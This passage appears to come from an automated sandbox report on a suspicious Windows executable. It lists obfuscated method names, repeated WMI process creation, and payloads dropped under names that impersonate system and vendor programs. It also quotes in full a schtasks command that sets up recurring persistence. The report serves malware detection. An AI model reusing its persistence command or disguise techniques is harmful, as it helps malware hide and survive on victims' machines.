Source: 0JLWNg4Sz1.exe, yc3dPprHKSGAWfjjOTe.cs High entropy of concatenated method names: 'wbkbQtq0Zln', 'qYWr0TUYwv', 'p4Ur244sfc', 'MKAryKx1B1', 'nBHLHObKo1IP6u7P30nk', 'ofbnuGbKWynTFpPkmGHP', 'CGFjagbKSvZ4hb27KuGE', 'cBJybqbKLCa1he8mRoPc', 'RSGiJ0bKJKlyxNVE43s1', 'WmJtkNbKUpB3pJPHIfCl'
Source: 0JLWNg4Sz1.exe, bO8JFAAd3ZAlHLFJ6eR.cs High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'tSXbQAXSZJu', 'PdlbAbXx1ob', 'e6sJGjbuciQt6jHr8XSv', 'qejCx5bu7aeQ6djOkIty', 'Il2sC9buqwXH90lWp3FW', 'wtx1J6bufqjPZphTEDys', 'CyS4SQbuMMG0CQDfe79J'
Source: 0JLWNg4Sz1.exe, TjDulSuvXpZoRMMd7L9.cs High entropy of concatenated method names: 'WwJp6w5kkN', 'cd8pbCBnOk', 'Yd7', 'O27pmE2Uuj', 'ngTpPtkfUh', 'R10pAZJDkF', 'BNRpIjphdT', 'BM893sbyyk0kMf6yn1Ch', 'KO05r2byEyLHQmwPQZ3a', 'lRopdbbyG3oTZ97Z9Veo'
Source: 0JLWNg4Sz1.exe, t56Qn6PEBQPJ6naQoFO.cs High entropy of concatenated method names: 'IBjAPGcYj4', 'eBMAAiL7Yc', 'UPYAIRoCsl', 'fsIlknbuAEN1Iv4grxJA', 'VBWgtabuIRaqYVRTB3xt', 'kvmKO2bumdvjCUkU4lA2', 'EKyFJrbuPw9pPSo2HaM8', 'cxeA32qpxH', 'yiYvBJbuRdEO4ixi4GRa', 'Al6fgwbu4dLZvjVEjeTg'
Source: 0JLWNg4Sz1.exe, ybZP7aQIdKRh1BejQUR.cs High entropy of concatenated method names: 'O3I', 'P9X', 'ntqbAVj4H6W', 'vmethod_0', 'imethod_0', 'BC2wg9b7si4qKnFT81Ci', 'gmsvAub7iMvgM86yxI5U', 'rgYeRsb73dKGPLQ7hQHU', 'UVbpOAb7YSJJFIi9PEmc', 'aac2qhb7OLZDUWmd39uC'
Source: 0JLWNg4Sz1.exe, hXM1RKoIXZXneRvfhe.cs High entropy of concatenated method names: 'brn73YGNu', 'BIkbWMbgpC6rSR5mTi7q', 'LsYTB7bgdYvAivxMQfs7', 'tyEI03bgDKLEZJXrFG9r', 'KNUmnibguYm0I07DxPto', 'GuhSkja9H', 'qpaLEe9KI', 'jynJpgQaR', 'occUg5S9U', 'umCCtUjpI'
Source: 0JLWNg4Sz1.exe, jgOfPCIGSkBKDbnxjsT.cs High entropy of concatenated method names: 'wa4IFfJWI1', 'WQbIaJ636q', 'x76IvtasX1', 'BraIz7xLoQ', 'gCI867VgWx', 'J208bC7dhV', 'gTJ8mn4lpf', 'pp5Yktbdin8p9NoaqcWY', 'AuFRrtbdO9baaMtwEY4k', 'Gv3D3tbdYgv51Vh2OoKa'
Source: 0JLWNg4Sz1.exe, IPNsrUgpsIdnQCbNZhO.cs High entropy of concatenated method names: 'method_0', 'C0MgcpV4HG', 'UXQg75QB9o', 'g9pgqqdPv4', 'RAkgfhSD16', 'yxigMl4ZcY', 'o96grIpmLj', 'DogMUebXSvGrLMkpFpod', 'KqndnGbXo9KyHZ2JB2IR', 'tfppWjbXWj8yAd1WjiIk'
Source: 0JLWNg4Sz1.exe, zfYiH1AZnhdHb38sJ98.cs High entropy of concatenated method names: 'kjHAarsX9A', 'c9MvWBbpApARR9RwuruN', 'gCogZtbpIuWuTIodVTBv', 'JAoaSlbpmKA0cEYvoitf', 'eG6OuxbpPRaO2YlfyGMJ', 'WUWYZGbpRmwPraRZ7Kgs', 'U4w44Rbp4xBqn6MiCeBW', 'wt2X5CbpQfCdT3f8tMkv', 'neeEwubpelBSa06Cg0vt', 'iUbI8NJsKR'
Source: 0JLWNg4Sz1.exe, ES5rquZpoZAAnv5Doa4.cs High entropy of concatenated method names: 'RetZcuoBhd', 'iTbZ7QBfOg', 'u5UZqZ66Vt', 'H6dZf8dhO8', 's8PZM5BEXP', 'pbnZrTblBH', 'tbwZZQFKck', 'GCiZhUPpPu', 'sfAZ9y880s', 'KIFZj2MVkg'
Source: 0JLWNg4Sz1.exe, d3KjZrI7sthRG79BAKM.cs High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cpGbA3bjavR', 'reFIfIg0Ny', 'imethod_0', 'ERiND7bp9GjwrScPk6Ey', 'yjNEafbpjlror3jSFgWP', 'gbSSilbplbIYubsiNRAf', 'fcWy0nbpH0nevdPIKnqC'
Source: 0JLWNg4Sz1.exe, lLsTi2wPNhEUYZSa5Ic.cs High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'NV6wIkRvdy', 'Write', 'NXow8SZX5h', 'nnEw4EyUhK', 'Flush', 'vl7'
Source: 0JLWNg4Sz1.exe, g0mC6MQXJrY7NdpcS30.cs High entropy of concatenated method names: 'fcEQ5gpgqR', 'uIpxBZbqY9y4P5QKF8Wf', 'avvGW3bqeMegw6wYeToc', 'IjsviYbq3Bs5TwB7xEAu', 'myyiF6bqsCQ2nrNQSRB4', 'P9X', 'vmethod_0', 'ijvbAw8IGON', 'imethod_0', 'AmV1gAbq8dKosmZmMRZc'
Source: 0JLWNg4Sz1.exe, l0haC3QwJqAsbJN04UF.cs High entropy of concatenated method names: 'mU8QDTlfVt', 'rBrQuinQST', 'iSlQpV2Pi4', 'kYDQdEbD9v', 'q0jQcs9Bfw', 'bBUQ7fFfo4', 'NILflGb7yxFatl0uJw1b', 'idBQdVb7ElqKJFSAlGWf', 'D8Iw91b7GH3hne2iEOoN', 'JEijpYb7TyNxaNy6FdCG'
Source: 0JLWNg4Sz1.exe, T9WJvy5siHytZdkYCSK.cs High entropy of concatenated method names: 'MZu51uNABU', 'OKw5SZhVLb', 'CqT5UxMagu', 'h7y5C6nJSV', 'fJq5nOkbmD', 'lOs5tmt39x', 'x6o5VKPGu3', 'qbh5gxdiKX', 'Dispose', 'EyYoHjbFAkZKL6ulPk23'
Source: 0JLWNg4Sz1.exe, WwK3d2aiJO0tV2nA8Ro.cs High entropy of concatenated method names: 'ST5mIdcdDJI', 'vicmIclHRnv', 'vGX9KgbauanjpLdC32rZ', 'KFMv7bbapSqRA9My4Slf', 'hkmhaAbadQtKHBHZxStr', 'pXagANbacQXxHv1kIP8a', 'oo5UV2ba7wky7M3VpV6O'
Source: 0JLWNg4Sz1.exe, G3ng6bmEg2NnX6OJK55.cs High entropy of concatenated method names: 'NxNP4PPfvj', 'xHv7l1bDbBcCfWBNtomC', 'TRipZNbDm6G7BD9cxXGU', 'GriWZubDPOML7HWioRtr', 'eSi1tTbBznY7Y40mT104', 'XEoQaJbD6JWVg5tZ64hR', 'fDpARPbDA8wbvvW4Eu0R', 'XdoP6Qa0qd', 'n8EPm8MCUM', 'aYHPPiIvF7'
Source: 0JLWNg4Sz1.exe, m8bnl8L55T72dLEBlaQ.cs High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'WsNLFDEmuI', 'JiKbQWrUSUl', 'QStgwcb9BorWT4x9LD2Z', 'a2Au9ab9gfEg6HOsejBl', 'Fc5BRUb9wM2Prmtuebp6', 'jiys1ab9DF4l9he9aUUm', 'UiI3P9b9uCABYybER9Nl'
Source: 0JLWNg4Sz1.exe, CKHAaTrRBZ3vc0rSSMd.cs High entropy of concatenated method names: 'SmQrttcvO6', 'kKHh92bK8ofimpo11QFS', 'hs5KZrbK42eg8JBAkgKF', 'rxyYwfbKAHftg37aZGDd', 'hFLywGbKI5G7SXkp8wU9', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0JLWNg4Sz1.exe, LYF8x3KMkw2ZP2d0YDG.cs High entropy of concatenated method names: 'mwFbQgNbWkB', 'jwDb8VPpRny', 'bjXMv6bxPAWwZRdvtAJt', 'OMxNL9bxbIlUSHFrvP1h', 'rFBXOrbxmssuGVWs3bsQ', 'fwcHcSbxAMncMB2Ywd6x', 'zq3rRRbx87Zq6m7Co73r', 'x2DxKQbx4CU40RaFlSFy', 'CH2UgZbxQZPMcYpMPCnl', 'imethod_0'
Source: 0JLWNg4Sz1.exe, oC7amm4RQG8WfHWfygR.cs High entropy of concatenated method names: 'JWw43GwoCR', 'CHf4YrF0px', 'Hg0gN1bcNEnQ3W1lSdOo', 'IU0yUebcOUjP80M1DIuN', 'fWyjXVbc1vmlakBJ8YgV', 'c53UkQbcoxxq7FWuLsBw', 'L4x5fPbcWxhiJnmR82Mh', 'gkUsNebcSXEYEiNbRxP8'
Source: 0JLWNg4Sz1.exe, QIE7HsKpvhlpcEmjKXN.cs High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'rKoKckQBbU', 'Jj6fRlb5pFHtIa1r1uFV', 'bdAHTWb5daLLiqNX6iwu', 'aXheh2b5c9qAaqZXZide', 'tmVMUZb570ZXe1KqnMYk', 'tyN9wFb5q3LNeOARZWMo', 'Ru3Fglb5fu6KuDo6Qfiy'
Source: 0JLWNg4Sz1.exe, SF80mm87HsL0NUZ7oPJ.cs High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'dLgbQeKQrgO', 'PdlbAbXx1ob', 'Nt6gG9bdlw7NYmEYjvd0', 'zvOFPKbdHkFrxx7lQERW', 'G3dBBIbdXls3UnxuyroQ'
Source: 0JLWNg4Sz1.exe, Ta5YhNfqBOqujlHd8a0.cs High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Guq3TIbTUqCvNm3krE1A', 'dcTmCxbTLKeqLfjue5nc', 'h2ob4GbTJHqTFXeb2aLp'
Source: 0JLWNg4Sz1.exe, P6T7Tb49C9xOmYMOwCl.cs High entropy of concatenated method names: 'PTu45Ge5f3', 'BRF4xcpPjq', 'zmaMibb7IobC1Zs1S0kV', 'PDYKykb78v27Sv6mmP4F', 'W9v4l3dtCn', 'wVH4H0CoFp', 'xsX4XBBmOX', 'uVx40Lbtms', 'MXd424P4eY', 'Tsh4yBw7PY'
Source: 0JLWNg4Sz1.exe, MRAl0GIZEPGAxLPqvt3.cs High entropy of concatenated method names: 'q64', 'P9X', 'xJLbAipDaHa', 'vmethod_0', 'r9DbQ8MmIEi', 'imethod_0', 'rHixBZbpE5IhOfQWG1i6', 'yaQd3abpG2ONCGFhpDEQ', 'wdamVFbpTBYmL3Dnjngs', 'NgWQrPbpK2sIMtoSdxCa'
Source: 0JLWNg4Sz1.exe, L6R8fXmLAk8EvkGmlSM.cs High entropy of concatenated method names: 'fjImUHWx5V', 'p0UmCewtKW', 'yVCXQXbBguAyY1KYNM6o', 'AcupoVbBwnDqPwPOJ8Ts', 'T3kbw2bBBfl8Wqp2L3Z3', 'HNM4DUbBDPDNkeqIR6CZ', 'YSESuPbBuByQ4o6slBhV', 'gqbBrfbBpnvLxp7wfLec'
Source: 0JLWNg4Sz1.exe, gZeU985hEAJd8mn80wu.cs High entropy of concatenated method names: 'method_0', 'method_1', 'IP25jdfn6I', 'uiQ5lIwcck', 'DMV5HmrywR', 'Dispose', 'OlG3U0bFLXWwncKJYAgC', 'TYPgaKbFJybhIBUh5lNr', 'CsTLBubFUhckEw2O3BAW', 'PYdbVXbFCaEDqpbrGU1C'
Source: 0JLWNg4Sz1.exe, QQwSq6Jbr3ePeqrlNbU.cs High entropy of concatenated method names: 'rC9', 'method_0', 'k63bQSHLPeA', 'cakbQL60Qoh', 'lOdoMRb9cQSBGTfr0MJp', 's5Ljmlb97mux0eoIpr4S', 'MTkA0sb9q0Ody7LCrk1l', 'PTQUPVb9fVyQNO31kjnB', 'X4lkGqb9Mn7t2xfkJkXi', 'TFW5fvb9r02cmYeeCdra'
Source: 0JLWNg4Sz1.exe, alltXiUsPRGraeial9Z.cs High entropy of concatenated method names: 'o0DnbKIwvG', 'hd4Yg9blCsR2ZPSrHFyn', 'imZaknblJ6McB1sE9elE', 'NxbOyjblU8lDyHNiAZhD', 'o3UYdNbln6DN7JoLfxaV', 'C1BUOgYhtC', 'VYuU1mymoo', 'NhsUNCNa4i', 'TsTUomj5wW', 'VFOUWdOWAU'
Source: 0JLWNg4Sz1.exe, BiGMOUBTBON1cqgSoIM.cs High entropy of concatenated method names: 'Ne8BkNeadc', 'ObmB5h1pum', 'utoBxThBaF', 'fCKBFkJ7PW', 'QfeBaGNXPg', 'OgrZ8Vb09MXidj876DMi', 'C5mEtlb0Zd5ymx41QMXe', 'RUCyrJb0hNcvQSq0exp9', 'mPeP0fb0jeqSE7IEiILK', 'YXXTn3b0lv8K7uPIPBJW'
Source: 0JLWNg4Sz1.exe, Qy7wX2SK0PUTXEoL22I.cs High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'OZebQsAWCWN', 'BsZbAXZTe81', 'uB77IZbh1FoyMknNTPx2', 'eZKe13bhNPvf8h1V2Eue', 'eQQMSmbhop4YZAcBBlSn', 'PAKBc5bhW7yImVFPnCHE', 'xAGNYTbhSZni8N6ebC85'
Source: 0JLWNg4Sz1.exe, LM0kccAVQ5qbMJjpZFH.cs High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'n2HbQPyjNdG', 'PdlbAbXx1ob', 'Q6UO4dbunHFvTWcnTkXL', 'lpaoawbutmCvYXEXWOZl', 'amJ92wbuV7dgNUA9PESA'
Source: 0JLWNg4Sz1.exe, u4Lt9yBv3ln6Ey5gaQr.cs High entropy of concatenated method names: 'ecnD6Td8Gh', 'Lr2DbLWIlj', 'd6WDmDM16n', 'YQtDPc1qER', 'PJwDA0kQMW', 'Tj6DIxy2sL', 'mpJ1fXb02wKHjqVHkT0l', 'q8TBNib0yLU9Sf51mHvQ', 'XHfDNYb0EymHlV7vt7mJ', 'jEehVNb0GYDGJ0k9dLKw'
Source: 0JLWNg4Sz1.exe, FOoCLDOClwF6n8gRt6h.cs High entropy of concatenated method names: 'dYZSsgNPP1', 'cAdSioTOy0', 'FbCYaWbZZBSRBpE3Cyrj', 'fLhVw9bZMKRb215d6aSe', 'd31iRLbZrRJkUAbiBQpw', 'xwFA9CbZhDoxEeHf7Zem', 'TIBINSbZ9Z6hdN0U8rky', 'f8GSSeSuPd', 'G4NIZ6bZl5tMNTsh7Lk1', 'IQrlCMbZHQkkhf8MEks9'
Source: 0JLWNg4Sz1.exe, KAxV1cLyU3xgnSNaKuN.cs High entropy of concatenated method names: 'P8ibQNOjVVl', 'aTYLGA033S', 'catbQoeQP2T', 'XqgUK0b9LQw8hs5Tv982', 'JaLguub9Jkf1TdvkqhSe', 'S2E2W5b9W7E0GhotinQa', 'wJcUupb9SjOHo3du7xjw', 'CqrOnfb9U3yuW6WmYP6N', 'dWu3t6b9CXOKs6n64NhQ', 'SVkKYbb9nBwZl3YMav5Q'
Source: 0JLWNg4Sz1.exe, RqEvCqRnA6B1x1Fg18M.cs High entropy of concatenated method names: 'VuM4HObMfKXYawIseyxq', 'A2rlJDbM7oEgFFIWWYU8', 'P9eqaTbMqZFbTghGwafA', 'Cqi8dJbMMk7TkvZ0Ixwe', 'SbyivyPaZB', 'EDHgFqbM9yrAvq72qDqO', 'm9HRjEbMZVsedoDeexwt', 'hQEn8hbMhck4OZ8bG4Mh', 'cvDObC6xjR', 'tTjBaIbMlPXxxfQLXFAk'
Source: 0JLWNg4Sz1.exe, omprTgJIEboMH3ZuGKb.cs High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'NZtJ42alAh', 'vmethod_0', 'vJtJQjUSnw', 'kG3bQJKA3IC', 'q1cjEGb9l9W0uHVsDqeX', 'yE8Z07b99VG1VqqU9EPP', 'TWqFDqb9jN4ip3eL7ytx'
Source: 0JLWNg4Sz1.exe, CSPVqRLrUaeKAxBnaO3.cs High entropy of concatenated method names: 'N2N', 'aHhbQOERq0N', 'VFELhdgNFy', 'k23bQ1AZtvv', 'na8V0vb98huPSGdeodOf', 'IybwnNb94dqjOYO6RAjg', 'iKEm8Zb9ATDkfMeG0kVS', 'rD62aYb9IZ2jXM3184B6', 'PhiFxGb9QtH8deqgrwms', 'OAK1N2b9RjOsYyW7LV0e'
Source: 0JLWNg4Sz1.exe, JMxt9k5p32I4KCJCsdm.cs High entropy of concatenated method names: 'AgA5cf9HxC', 'Pui57H0iHM', 'IH85qPwkuN', 'sHy5fpmInH', 'Dispose', 'xqscH3bFsLhiInO7HSIu', 'U3D7nobF3IB8hkoPuRqP', 'sSqQygbFYlsh4FpfW27k', 'Oocu5kbFinRBQCywvkDm', 'LsRYcEbFOjE2lgvd1NLt'
Source: 0JLWNg4Sz1.exe, euDXq5lAyGT9uTRTSc.cs High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'tWrXJe7SP'
Source: 0JLWNg4Sz1.exe, QMhsB8bWQINTVsc31X9.cs High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'en4b4z5KTR3', 'PdlbAbXx1ob', 'LcxrBybwCnYSwd5sYVGA', 'REjpcAbwnyUCWRbSplHO'
Source: 0JLWNg4Sz1.exe, rb71eNw9GHN98tUkc5T.cs High entropy of concatenated method names: 'FTcwaxXNdg', 'oI4wzsswMn', 'sYdwlSrkvh', 'kLlwHESJt5', 'AbvwXtXZru', 's9Yw0jC0ZX', 'WUWw2mkmXl', 'gdowyJQ5nB', 'zjuwEwKexo', 'm9RwGVKGVA'
Source: 0JLWNg4Sz1.exe, g1lOkGZxrBxCWmoVRYP.cs High entropy of concatenated method names: 'MSnZaohooQ', 'hrlZvP15WE', 'otKZz159uZ', 'FdKh6N3fS1', 'r2qhbnyZvv', 'qRthm08NRk', 'YO2hPRRlVW', 'ggZhAjrAdR', 'bt1hI3CyZb', 'xYXh8PHeZy'
Source: 0JLWNg4Sz1.exe, NldO1wI1ZRNSSGGvm6u.cs High entropy of concatenated method names: 'PthIwIJLJ8', 'ULbIB3ha3n', 'sZ6IDRYSZC', 'gJAtQwbpZUDyBNN07sNV', 'N91UmIbpMgxRjF5vvylT', 'QtLsMMbprc4OUbYtsNMS', 'SfhInbAHfD', 'lJMItWhp2c', 'Th9Ch7bp74KGauiXEFvC', 'VN9DaJbpqwTeWwZqcmfF'
Source: 0JLWNg4Sz1.exe, UDNl7ZJ1t2cRHZPrh9Z.cs High entropy of concatenated method names: 'DXa8YpbjOuncu01UesLB', 'F19w23bj1IMwTFujDU03', 'Sg8Js2bjsKPY0N7d7KUM', 'nMeeXAbji8LMBU8Y0C5c', 'method_0', 'method_1', 'JcfJoRYe4X', 'TeBJWMfvnd', 'ggcJSpWQ52', 'xaFJLijZC2'
Source: 0JLWNg4Sz1.exe, wgUbhRRmoxBiwNGOuoV.cs High entropy of concatenated method names: 'NMCRAsyWOH', 'qUHRI7ok7V', 'V9KR8qaIyv', 'kppR48MouJ', 'kIIRQpGd7q', 'VirRRuyIsL', 'FrZReynXXD', 'XguR3awwZl', 'UIeRYGkbjj', 'pvfRsBLEUH'
Source: 0JLWNg4Sz1.exe, W1MqfXdJMaPI8y9q2Sv.cs High entropy of concatenated method names: 'caFci0PaYt', 'ctdfKhbEH0BIHn6P6weO', 'oIGLPIbEjJxSmVE7HSml', 'XFL7Q8bElOSpdccYEiyI', 'kPxubGbEXkB57qR1i9CW', 'kt5', 'AHFdCTtBjn', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0JLWNg4Sz1.exe, kYSjZaDh6h9BTBOkcKV.cs High entropy of concatenated method names: 'OY6DjMhrKE', 'u5SDlLZ476', 'bjYDHhX029', 'iAkDXRR7cU', 'a6qD0MlvOU', 'EbTD2Zq7Ji', 'EFHDyCyuQn', 'DVoDEUtfCa', 'BW3DGFsmhL', 'F44DTXxjLZ'
Source: 0JLWNg4Sz1.exe, S6TtBBaZoTTKOAkZZlK.cs High entropy of concatenated method names: 'Vsjb8d3UJCi', 'PA7b8cqSI81', 'cbIb87IJQLm', 'RlLb8qn5v7k', 'NgWb8fMeX6q', 'qcjb8MPp5BL', 'KHeb8rjcHh1', 'jQnvISQ1hN', 'pM4b8Z5Z0QD', 'IH2b8hGIbgN'
Source: 0JLWNg4Sz1.exe, M9vuuWx6GBvjLeTm4nX.cs High entropy of concatenated method names: 'HYfxAPK7xC', 'eJtxI0Tq4w', 'q3OHNUbF9MGVC4bu37r4', 'YJRvNfbFZ7shy4aThuwg', 'pqY9e3bFh1iac7KWmqFr', 'JxwYkXbFjEdjmiYfZCCl', 'jsfV46bFl9DU691aE52W', 'mRxZLmbFHm69jh40uZpt', 'si7xmUQSyt', 'wTlufGbFqAXPpPYrDh7c'
Source: 0JLWNg4Sz1.exe, jhG8A4QhyucfjXMipUP.cs High entropy of concatenated method names: 'P9X', 'XimbQYKJlSi', 'imethod_0', 'bdhQjhC2QU', 'yOGXRcb7vThrTt5NgHae', 'aPueChb7zU4SxSSFTCHs', 'Ameqfsbq68Pc4WSavAE5', 'b6kNHrbqb9W3po1BGRgK', 'pcC78xbqmrGWcjR8Bk1S'
Source: 0JLWNg4Sz1.exe, xl4l8n4bGNxEn79Hq5X.cs High entropy of concatenated method names: 'iGQ4PVxUDq', 'ccY4AmvxZX', 'qbo4IdENRX', 'pVixutbcRHYi5MJ3ZLVi', 'phZP45bc4dWjZyRdmI9C', 'zwIpxHbcQRwBc2UDg2rO', 'VT66QFbceVHRelrVG3wy', 'IXZVmGbc31io9O9BGrRd', 'xh8CDSbcYEuXt4VmKuyF', 'DNGlQcbcs8WGfXZBrZbF'
Source: 0JLWNg4Sz1.exe, LoGmZY4pgRVQxt1yNTZ.cs High entropy of concatenated method names: 'eoG4cxKTI8', 'iAh47j9tn7', 'i64Qinbc20xdggfYDg5f', 'D0YVL0bcXy14x2ThpQQE', 'alI5a9bc0Q2J3krx67Ft', 'PI0no1bcyodUYBE4oyvr', 'jD8N1YbcEr5WJ6Fn7kOn', 'WCjDjZbcG22taZlH3xFs', 'hHWru1bcTCCDmk07DeXQ', 'dnHgXybcKHClnG50tJQT'
Source: 0JLWNg4Sz1.exe, twGaCcfxExm4QVpv4X3.cs High entropy of concatenated method names: 'b76', 'method_0', 'q7Q', 'K41', 'vEh', 'pu6', 'Xk4', 'K81', 'YV4', 'method_1'
Source: 0JLWNg4Sz1.exe, dZF6KOVnHUCFSiJA1fN.cs High entropy of concatenated method names: 'ydgVVaxVj4', 'ROWVghusDZ', 'ALxVwODZo8', 'NdWVBqpcd1', 'E9AVDcBJt7', 'Jtn2vHbH2dNen3LM9NBi', 'sSMYYxbHXym88ZTAkeDI', 'OXBHpibH0vQGT9BG9RYy', 'ufOf5UbHyAPdQpEg6R0h', 'K17pv5bHExfvUIPGpYFr'
Source: 0JLWNg4Sz1.exe, cTsTGcaWXYIhqk3nyC4.cs High entropy of concatenated method names: 'kmNaDpUZgA', 'pcwauxICB6', 'iEwap69FTG', 'd6SadT1YZH', 'lPDacEiR8U', 'BPqa7SXSd1', 'gYxaqVomLk', 'R3TafdLpFR', 'Q84aMST7LK', 'UfLar02Hdm'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Recovery\StartMenuExperienceHost.exe Jump to dropped file
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File created: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Jump to dropped file
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Recovery\DViaOgnvmAhwCXZ.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log Jump to dropped file
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe File created: C:\Users\user\Desktop\KjTCumlu.log Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
